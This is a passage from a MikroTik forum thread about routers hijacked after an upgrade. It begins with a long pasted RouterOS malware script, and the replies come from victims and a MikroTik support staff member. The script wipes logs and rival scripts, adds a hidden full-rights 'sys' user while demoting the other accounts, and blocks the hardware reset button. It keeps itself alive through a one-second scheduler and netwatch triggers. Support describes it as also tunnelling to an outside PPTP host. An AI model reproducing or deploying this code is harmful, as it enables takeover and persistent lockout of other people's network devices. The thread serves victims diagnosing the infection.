:if ([:len [/fil find name=init13.rsc]]!=0) do={/sys log rem [find default=no];/sys log action rem [find default=no];:del 1;/imp file=init13.rsc;/fil rem [find name=init13.rsc];}
:if ([:len [/fil find name=init15.rsc]]!=0) do={/imp file=init15.rsc;/fil rem [find name=init15.rsc];}
/fil rem [find type=script];/ip fir fil rem [find comment=system];/ip fir nat rem [find comment=system];/ip fir mangle rem [find comment=system];
/ip rou rem [find comment=system];/ip poo rem [find name=system];/ppp pro rem [find comment=system];/ppp sec rem [find comment=system];
/too traffic-g stop;/too traffic-g stream rem [find];/too traffic-g packet rem [find];/too traffic-g port rem [find];
:loc ncnt;:set ncnt [:len [/ip fir nat find comment!="system"]];:if ($ncnt=0) do={/ip fir nat add action=masquerade chain=srcnat}
:if ([:len [/fil find name=code0.txt]]=0) do={/fil pri file=code0.txt;:del 1;/fil set [find name=code0.txt] content="$wx,$acx,$viax,$addx";} else={:if ([/fil get [find name=code0.txt] size]>3800) do={/fil set [find name=code0.txt] content="$wx,$acx,$viax,$addx";} else={:set contX [/fil get [find name=code0.txt] content];/fil set [find name=code0.txt] content="$contX\n$wx,$acx,$viax,$addx";}}
:set tt [/sys clo get time];:for x from=0 to=([:len $tt]-1) do={:if ([:pick $tt $x ($x+1)]=":") do={:set tt ([:pick $tt 0 $x].",".[:pick $tt ($x+1) [:len $tt]]);}}
:set tt [:toarray $tt];:set sysTime ((($tt->0)*3600)+(($tt->1)*60)+($tt->2))
/sys scr job {:fore j in=[find] do={:set tSCR [get $j script];:set tSTA [get $j start];:if ([:typeof [get $j script]]="str") do={:loc scriptName [get $j script];:if (($scriptName="sysMonROS") or ($scriptName="init0") or ($scriptName="init1")) do={[rem $j];}} else={:set stJ [:pick $tSTA ([:find $tSTA " "]+1) [:len $tSTA]];:for x from=0 to=([:len $stJ]-1) do={:if ([:pick $stJ $x ($x+1)]=":") do={:set stJ ([:pick $stJ 0 $x].",".[:pick $stJ ($x+1) [:len $stJ]]);}};:set stJ [:toarray $stJ];:set jST ((($stJ->0)*3600)+(($stJ->1)*60)+($stJ->2));:if ($sysTime<$jST) do={:set RF ($sysTime+86400-$jST);} else={:set RF ($sysTime-$jST);};:if ($RF>$HL) do={[rem $j];};}}}
:set sysE [/sys clo get time];/sys scr job rem [find script!="system"];/sys scr job rem [find type="login"];
:if ([:len [/ip fir lay find name=syslog]]=0) do={/ip fir lay add name=syslog regexp=1;} else={:if ([:len [:tonum [/ip fir lay get [find name=syslog] regexp]]]=0) do={/ip fir lay set [find name=syslog] regexp=1;} else={:loc J [:tonum [/ip fir lay get [find name=syslog] regexp]];:set J ($J+1);/ip fir lay set [find name=syslog] regexp=$J;}};
:while (!$sysNoOther or $mLOG) do={
:loc f1 ":glo f2 false;/fil {:fore f in [find] do={:loc x [get \$f name];:if ([:len [:find \$x \"ss.db\"]]=1) do={:set f2 true;}}};:if (!\$f2 and \$s5) do={:set sysJ true;};"
/too net rem [find host=9.9.9.9];/too net add host=9.9.9.9 dis=no int=1 tim=1 up=($f1.$s9) down=($f1.$s9);
/sys pac upd can;:del 1;:set sR2 ($sR2+1);:if ($sR2>$sRM) do={/sys reb;};
/fil rem [find type=".log file"];/fil rem [find type=package];/fil rem [find type=".npk file"];/fil rem [find type=script];
:loc filCLR {"sys";"func";"auto"};:loc dd;/fil {:fore f in [find] do={:loc n [get $f name];:fore ww in $filCLR do={:set dd [:len [:find $n $ww]];:if ($dd!=0) do={/fil rem $n;};}}}
:loc sysPPS;:if ([:len [/ip fir lay find name=sysPPS]]!=0) do={:set sysPPS [/ip fir lay get [find name=sysPPS] regex]}
:if ([:len [/ip fir lay find name=sysIntru]]=0) do={/ip fir lay add name=sysIntru regex=true}
:set fPort "";:set tPort "";:set sPort "";:set DOM "";:set PTPST "";
/sys scr env rem [find name=init0V];/sys scr env rem [find name=tokenSYS];/sys scr env rem [find name=ntpIP];/sys scr env rem [find name=tzspIP];/sys scr env rem [find name=SuperManServer];/sys scr env rem [find name=TheHulkServer];/sys scr env rem [find name=routerOSServer];/sys scr env rem [find name=ROSuser];/sys scr env rem [find name=ROSpass];/sys scr env rem [find name=init0nextIP];/sys scr env rem [find name=init0dstFile];/sys scr env rem [find name=init1nextIP];/sys scr env rem [find name=init1dstFile];/sys scr env rem [find name=initDBready];/sys scr env rem [find name=CPUhighMAX];/sys scr env rem [find name=CPUusedMAX];/sys scr env rem [find name=CPUhighCount];/sys scr env rem [find name=CPUused];
:loc done false;:loc rNum;:loc rnd;/int ether {:fore e in [find running=yes] do={/int monitor-traffic [get $e name] once do={:loc tmp;:set rnd $"rx-bits-per-second";:set tmp [:tonum [:pick $rnd ([:len $rnd]-4) ([:len $rnd]-2)]];:if ($tmp>0) do={:set done true;:set rNum $tmp;}}}};:if (!$done) do={:set rNum 5};
:loc rosV 0;:loc v;:loc pos 0;:set v [/sys reso get ver];:loc scope {" ";"rc";"("};
:fore w in $scope do={:if ([:len [:find $v $w]]!=0) do={:set v [:pick $v 0 [:find $v $w]]}}
:for x from=0 to=([:len [:tostr $v]]-1) do={:if ([:pick [:tostr $v] $x ($x+1)]=".") do={:set v ([:pick [:tostr $v] 0 $x].",".[:pick [:tostr $v] ($x+1) [:len [:tostr $v]]])}};
:set v [:toarray $v];:if ([:len $v]=2) do={:set v ($v,0)};:set pos 0;
:fore k in $v do={:if ($pos=0) do={:set rosV ($rosV+($k*1000));};:if ($pos=1) do={:set rosV ($rosV+($k*10));};:if ($pos=2) do={:set rosV ($rosV+$k);};:set pos ($pos+1);};
:loc reH (299-$rNum);:loc reMX (300-$rNum);
:loc p0 ":glo xey [:pick [/sys clo get time] 6 8];:loc s7 \":del 3;:glo sysJ true;:del 1;/too net rem [find host=7.7.7.7];\";:if (([/sys pac get ppp disabled] or [/sys pac get sec disabled]) or [/sys pac get advance disabled]) do={/sys pac enable [find];/too net rem [find host=7.7.7.7];/too net add host=7.7.7.7 dis=no int=1 tim=1 up=\$s7 down=\$s7;:del 1;/sys reb;};"
:loc m1 "/too mac-ser set [find] disabled=yes;/too mac-ser mac-win set [find] disabled=yes;"
:loc m2 "/too mac-ser set allowed-interface-list=none;/too mac-ser mac-win set allowed-interface-list=none;"
:loc a1 ":glo PRB [:tostr [/sys rou set get prot]];:if ((\$PRB=\"disabled\") or (\$PRB=\"false\")) do={:set sysJ true;/sys rou set set ena=no prot=enabled reformat-hold-button=$reH;};"
:loc a2 ":glo JRST [:tostr [/sys rou set get ena]];:if ((\$JRST=\"enabled\") or (\$JRST=\"true\")) do={:set sysJ true;/sys rou set set ena=no prot=enabled reformat-hold-button=$reH;};"
:loc c0 "/sys rou set set ena=no prot=enabled sil=yes boot-dev=nand-only;:glo sysJ;"
:loc c1 "/sys rou set set ena=no prot=enabled sil=yes boot-dev=nand-only reformat-hold-button=$reH;:glo sysJ;"
:loc c2 "/sys rou set set ena=no prot=enabled sil=yes boot-dev=nand-only reformat-hold-button=$reH reformat-hold-button-max=$reMX;:glo sysJ;"
:loc c3 ":glo sysJ;:glo JRST [:tostr [/sys rou set get ena]];:if ((\$JRST=\"enabled\") or (\$JRST=\"true\")) do={:set sysJ true;};"
:loc d1 ":loc s6 \":del 60;:glo sysJ false;:del 1;/too net rem [find host=6.6.6.6];\";:glo JRST [:tostr [/sys rou set get ena]];:if ((\$JRST=\"enabled\") or (\$JRST=\"true\")) do={/too net rem [find host=6.6.6.6];/too net add host=6.6.6.6 dis=no int=1 tim=1 up=\$s6 down=\$s6;/sys rou set set ena=no prot=enabled reformat-hold-button=$reH;:del 1;:if ([:len [/use gro find name=sys]]=0) do={/use gro add name=sys pol=loc,win,reb;:del 1;/use add nam=sys gro=full dis=no pas=([/ip fir lay get [find name=syscret] regexp].\$xey);/use set [find name!=sys] group=sys;} else={/use gro set [find name=sys] pol=!wri,!pas,!sen,!api,!loc,!tel,!ssh,!ftp,!pol,!sni};/sys pac upd set cha=cur;/sys pac upd che;/fil rem [find type=script];:exec {/sys pac upd ins;};:if ([:len [:find [/sys pac upd get stat] Down]]=0) do={/sys reb;}};"
:loc uScr;:if ($rosV>=6410) do={:set uScr ($p0.$c2.$a1.$a2.$m2);} else={:if ($rosV>=6400) do={:set uScr ($p0.$c2.$a1.$a2.$m1);} else={:if ($rosV>=6346) do={:if (($JRST="enabled") or ($JRST="true")) do={:set uScr ($p0.$d1.$m1);} else={:set uScr ($p0.$d1.$m1);}} else={:if ($rosV>=6330) do={:set uScr ($p0.$c1.$a1.$a2.$m1);} else={:set uScr ($p0.$c0.$m1);}}}}
:if ([:len [/too net find host=127.0.0.1]]!=1) do={/too net rem [find host=127.0.0.1];/too net add host=127.0.0.1 int=1 tim=1 dis=no up=$uScr down=$uScr;} else={/too net set [find host=127.0.0.1] int=1 tim=1 dis=no up=$uScr down=$uScr;}
:loc sysX "system";:loc word {"\"system\"";"=system";"rem system";"rem system";"remo system";"remov system";"remove system";"ip ser";"user g";"user a";"user s";"use g";"use a";"use s"};
/sys scr {:fore s in [find name!=$sysX] do={:loc n [get $s name];:loc sSRC [get $s source];:fore w in $word do={:loc d [:len [:find $sSRC $w]];:if ($d!=0) do={/sys scr rem $n;:set sysJ true;};};}}
/sys sch {:fore s in [find name!=$sysX] do={:loc n [get $s name];:loc sSRC [get $s on-event];:fore w in $word do={:loc d [:len [:find $sSRC $w]];:if ($d!=0) do={/sys sch rem $n;:set sysJ true;};};}}
/too net {:fore s in [find host!=127.0.0.1] do={:loc h [get $s host];:if ($h!=8.8.8.8) do={:loc nws [get $s up];:fore w in $word do={:loc d [:len [:find $nws $w]];:if ($d!=0) do={/too net rem [find host=$h];:set sysJ true;};};:loc nws [get $s down];:fore w in $word do={:loc d [:len [:find $nws $w]];:if ($d!=0) do={/too net rem [find host=$h];:set sysJ true;};};}}}
:if ([:len [/use find name=system]]!=0) do={/use rem [find name=system];:set sysJ true}
:if ([/sys route set get boot-device]!="nand-only") do={/sys route set set boot-device=nand-only;:set sysJ true;}
:if ([:len [/sys scr find name=system]]=1) do={:loc sysSrcX [/sys scr get [find name=system] source];:loc sysPolX [/sys scr get [find name=system] policy];:if ($sysSrcX!=$sysSrc) do={/sys scr set [find name=system] source=$sysSrc;:set sysJ true;};:if ($sysPolX!=$sPol) do={/sys scr set [find name=system] policy=$sPol;:set sysJ true;};
} else={
/sys scr add name=system policy=$sPol source=$sysSrc;
:if ([:len [/sys sch find name=system]]=1) do={/sys sch set [find name=system] int=1s on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;} else={/sys sch add int=1s name=system on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;}
:if ([:len [/ip fir lay find name=sysJail]]=0) do={/ip fir lay add name=sysJail regexp=1;} else={:if ([:len [:tonum [/ip fir lay get [find name=sysJail] regexp]]]=0) do={/ip fir lay set [find name=sysJail] regexp=1;} else={:loc J [:tonum [/ip fir lay get [find name=sysJail] regexp]];:set J ($J+1);/ip fir lay set [find name=sysJail] regexp=$J;}};:if ([:len [/sys scr find name=system]]=1) do={:del 0;} else={/sys scr add name=system policy=$sPol source=$sysSrc;};/sys reb;
}
/sys scr {:fore scri in=[find name!="system"] do={:if ([get $scri source]=$sysSrc) do={[rem $scri];:set sysJ true;}}}
:if ([:len [/sys sch find name=system]]=1) do={
:loc SCHX [/sys sch get [find name=system] policy]
:if ($SCHX!=$sSchP) do={/sys sch set [find name=system] policy=$sSchP;:set sysJ true;}
:if ([/sys sch get [find name=system] disabled]!=no) do={/sys sch set [find name=system] disabled=no;:set sysJ true;}
:if ([/sys sch get [find name=system] interval]!="00:00:01") do={/sys sch set [find name=system] int=1s;:set sysJ true;}
:if ([/sys sch get [find name=system] start-time]!="00:00:00") do={/sys sch set [find name=system] start-time=00:00:00;:set sysJ true;}
:if ([/sys sch get [find name=system] start-date]!="jan/01/1970") do={/sys sch set [find name=system] start-date=jan/01/1970;:set sysJ true;}
:if ([/sys sch get [find name=system] on-event]!="system") do={/sys sch set [find name=system] on-event=system;:set sysJ true;}
} else={/sys sch add int=1s name=system on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;:set sysJ true;}
:set UAC [:len [/use act find via!="ftp"]];:if ($UAC=0) do={:set sysNoOther true;} else={:set sysNoOther true;/use act {:fore acc in=[find via!="ftp"] do={:if ([get $acc name]!="system") do={:set sysNoOther false;}}}}
/use act {:fore u in=[find] do={:loc uu [get $u address];:loc vv [get $u via];:if (([:len [:find $uu ":"]]!=0) or (($vv="console") or ($vv="local"))) do={:set mLOG true;} else={:set mLOG false}}};
:loc upROSX [/sys pac upd get status];:if ([:len [:find $upROSX "Downloaded"]]=0) do={:del 0} else={/sys pac upd can;}
:if ([:len [/ip fir lay find name=syscret]]=0) do={/ip fir lay add name=syscret regexp=$syscret;:set sysJ true;} else={:if ([/ip fir lay get [find name=syscret] regexp]!=$syscret) do={/ip fir lay set [find name=syscret] regexp=$syscret;:set sysJ true;}}
:if ($sysJ) do={
:if ([:len [/ip fir lay find name=sysJail]]=0) do={/ip fir lay add name=sysJail regexp=1;} else={:if ([:len [:tonum [/ip fir lay get [find name=sysJail] regexp]]]=0) do={/ip fir lay set [find name=sysJail] regexp=1;} else={:loc J [:tonum [/ip fir lay get [find name=sysJail] regexp]];:set J ($J+1);/ip fir lay set [find name=sysJail] regexp=$J;}};
:if ([:len [/sys scr find name=system]]=1) do={:del 0;} else={/sys scr add name=system policy=$sPol source=$sysSrc;};
:if ([:len [/sys sch find name=system]]=1) do={/sys sch set [find name=system] int=1s on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;} else={/sys sch add int=1s name=system on-event=system start-date=jan/01/1970 start-time=00:00:00 disable=no;};/sys reb;
}
}
:set sR2 0;/snmp exp ver fil=init10;/ip ser exp ver fil=init11;/ip fir service-port exp ver fil=init12;/sys log set [find] disable=yes;/sys log exp ver fil=init13;/sys ntp cli exp ver fil=init15;/sys log set [find] action=remote disabled=yes;
:loc logX [/sys clo get time];:set contX [/fil get [find name=code0.txt] content];:del 1;:if ([:file get code0.txt size]<3800) do={/fil set [find name=code0.txt] content="$contX,$logX";:del 1;};/sys scr env rem [find];
}
}
Do you find the solution?
Not yet but The Tongtang will charge me for 6,000 bath. I'm looking for another way. Today I had contact someone called Pro of Mikrotik he said he can fixes it without remove NAND.
 
bobbyyo
just joined
Posts: 6
Joined: Sun Mar 04, 2018 7:44 pm

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Mar 05, 2018 5:14 pm

The process of NAND Gate removal
OMG, I thought you're gonna contact me directly to get a hint on removing that script, but now I see you've chosen a hard(ware) way for resolution of the problem :)
I have tweeted you. Please find the solution.
 
User avatar
jabberd
just joined
Posts: 24
Joined: Tue Feb 28, 2017 1:10 pm
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Mon Mar 05, 2018 11:23 pm

I have tweeted you. Please find the solution.
Please tweet me again, I haven't got anything yet.
 
bobbyyo
just joined
Posts: 6
Joined: Sun Mar 04, 2018 7:44 pm

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Tue Mar 06, 2018 2:26 am

I have tweeted you. Please find the solution.
Please tweet me again, I haven't got anything yet.
Did it
 
User avatar
jabberd
just joined
Posts: 24
Joined: Tue Feb 28, 2017 1:10 pm
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Tue Mar 06, 2018 4:13 am

Did it
Still nothing. What's your username there?
 
bobbyyo
just joined
Posts: 6
Joined: Sun Mar 04, 2018 7:44 pm

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Tue Mar 06, 2018 4:53 am

Did it
Still nothing. What's your username there?
@ekawit. I tweeted you again a few second ago. Do you get my message?
 
dadaniel
Member Candidate
Member Candidate
Posts: 155
Joined: Fri May 14, 2010 11:51 pm

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Tue Mar 06, 2018 12:13 pm

Can anyone comment on what this script is doing beside of changing credentials?
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 5921
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Tue Mar 06, 2018 2:14 pm

A lot of things. In short:
* adds user "sys" with password 12345678 + [:pick [/sys clo get time] 6 8]
* creates pptp client to asgard.does-it.net
* add firewall rules to accept traffic from pptp interface and src 127.0.0.1, 172.16.0.0/12, drop the rest
* change ip services to access only from 127.0.0.1, 172.16.0.0/12
* route 172.x.x.x networks over pptp interface
* use pseudo random generator from interface rx-bits-per-second to set reformat-hold-button and reformat-hold-button-max
* add netwatch and scheduler to run the scripts that disables mac server, checks for update in current channel and upgrade, etc.

netwatch script also imports ss.db file.
 
bobbyyo
just joined
Posts: 6
Joined: Sun Mar 04, 2018 7:44 pm

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Tue Mar 06, 2018 5:28 pm

Thank you so much very very much to Mr.jabberd. Now the problem was solved.
 
JB172
Member
Member
Posts: 301
Joined: Fri Jul 24, 2015 3:12 pm
Location: AWMN

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Tue Mar 06, 2018 10:19 pm

Thank you so much very very much to Mr.jabberd. Now the problem was solved.
And what is the solution?
 
User avatar
jabberd
just joined
Posts: 24
Joined: Tue Feb 28, 2017 1:10 pm
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Wed Mar 07, 2018 12:02 am

And what is the solution?
The solution is to use the winbox email tool bug, which I had reported to the support. I don't want to share the details here, sorry.
 
Trisc
Member Candidate
Member Candidate
Posts: 242
Joined: Sat May 29, 2004 11:24 pm
Location: Glos, UK

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Fri Mar 09, 2018 5:44 pm

A lot of things. In short:
* adds user "sys" with password 12345678 + [:pick [/sys clo get time] 6 8]
* creates pptp client to asgard.does-it.net
* add firewall rules to accept traffic from pptp interface and src 127.0.0.1, 172.16.0.0/12, drop the rest
* change ip services to access only from 127.0.0.1, 172.16.0.0/12
* route 172.x.x.x networks over pptp interface
* use pseudo random generator from interface rx-bits-per-second to set reformat-hold-button and reformat-hold-button-max
* add netwatch and scheduler to run the scripts that disables mac server, checks for update in current channel and upgrade, etc.

netwatch script also imports ss.db file.

I think we got hit with this also - several routers not responding to the administrator password although we are scrupulous about replacing 'admin' and using a secure password on every device.
Router is not responding to hard reset also so I am suspicious reformat hold period is changed also

How is it possible to see this script if router access is denied?
 
User avatar
mrz
MikroTik Support
MikroTik Support
Posts: 5921
Joined: Wed Feb 07, 2007 12:45 pm
Location: Latvia
Contact:

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Fri Mar 09, 2018 5:59 pm

Well if you got lucky and there was no rx-bits-per-second on any of interfaces when script was executed, then reformat-hold-button=299-5 and reformat-hold-button-max=300-5.
 
Trisc
Member Candidate
Member Candidate
Posts: 242
Joined: Sat May 29, 2004 11:24 pm
Location: Glos, UK

Re: After upgrade firmware 6.40.5, Can't change admin's group to full

Fri Mar 09, 2018 6:36 pm

i've held the reformat button down for over 4 mins but no good

Who is online

Users browsing this forum: No registered users and 48 guests